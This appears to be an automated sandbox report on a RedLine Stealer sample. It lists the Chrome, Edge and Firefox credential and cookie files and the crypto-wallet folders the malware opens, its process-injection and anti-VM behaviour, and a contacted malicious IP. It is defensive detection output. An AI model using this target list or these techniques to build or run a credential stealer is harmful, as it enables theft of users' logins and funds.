Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.0.4A64.tmp.x.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.1943582623.0000000000A92000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568551 Sample: file.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 7 other signatures 2->74 9 file.exe 1 3 2->9         started        process3 file4 54 C:\Users\user\...\7D3ED97FB83B796922796.exe, PE32+ 9->54 dropped 56 7D3ED97FB83B796922...exe:Zone.Identifier, ASCII 9->56 dropped 84 Found evasive API chain (may stop execution after checking mutex) 9->84 86 Found API chain indicative of debugger detection 9->86 88 Contains functionality to inject threads in other processes 9->88 90 9 other signatures 9->90 13 svchost.exe 7 9->13         started        17 audiodg.exe 7 9->17         started        19 msiexec.exe 7 9->19         started        signatures5 process6 dnsIp7 66 176.111.174.140, 1912, 49730, 49731 WILWAWPL Russian Federation 13->66 120 Found evasive API chain (may stop execution after checking mutex) 13->120 122 Found API chain indicative of debugger detection 13->122 124 Contains functionality to inject threads in other processes 13->124 21 explorer.exe 38 6 13->21 injected 126 Changes the view of files in windows explorer (hidden files and folders) 17->126 128 Injects code into the Windows Explorer (explorer.exe) 17->128 130 Writes to foreign memory regions 17->130 132 Creates a thread in another existing process (thread injection) 19->132 134 Injects a PE file into a foreign processes 19->134 signatures8 process9 file10 50 C:\Users\user\AppData\...\7405.tmp.zx.exe, PE32+ 21->50 dropped 52 C:\Users\user\AppData\...\4A64.tmp.x.exe, PE32 21->52 dropped 76 System process connects to network (likely due to code injection or exploit) 21->76 78 Benign windows process drops PE files 21->78 80 Found evasive API chain (may stop execution after checking mutex) 21->80 82 Contains functionality to inject threads in other processes 21->82 25 7405.tmp.zx.exe 52 21->25         started        29 7D3ED97FB83B796922796.exe 3 21->29         started        31 7D3ED97FB83B796922796.exe 3 21->31         started        33 4A64.tmp.x.exe 5 4 21->33         started        signatures11 process12 file13 58 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->58 dropped 60 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->60 dropped 62 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->62 dropped 64 47 other files (7 malicious) 25->64 dropped 92 Multi AV Scanner detection for dropped file 25->92 94 Machine Learning detection for dropped file 25->94 35 7405.tmp.zx.exe 25->35         started        96 Found evasive API chain (may stop execution after checking mutex) 29->96 98 Found API chain indicative of debugger detection 29->98 100 Contains functionality to inject threads in other processes 29->100 114 2 other signatures 29->114 37 svchost.exe 29->37         started        39 audiodg.exe 29->39         started        41 msiexec.exe 29->41         started        102 Writes to foreign memory regions 31->102 104 Allocates memory in foreign processes 31->104 116 2 other signatures 31->116 43 msiexec.exe 31->43         started        46 audiodg.exe 31->46         started        48 svchost.exe 31->48         started        106 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->106 108 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->108 110 Tries to harvest and steal browser information (history, passwords, etc) 33->110 112 Tries to steal Crypto Currency Wallets 33->112 signatures14 process15 signatures16 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 43->118
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
176.111.174.140
 unknown Russian Federation
201305 WILWAWPL true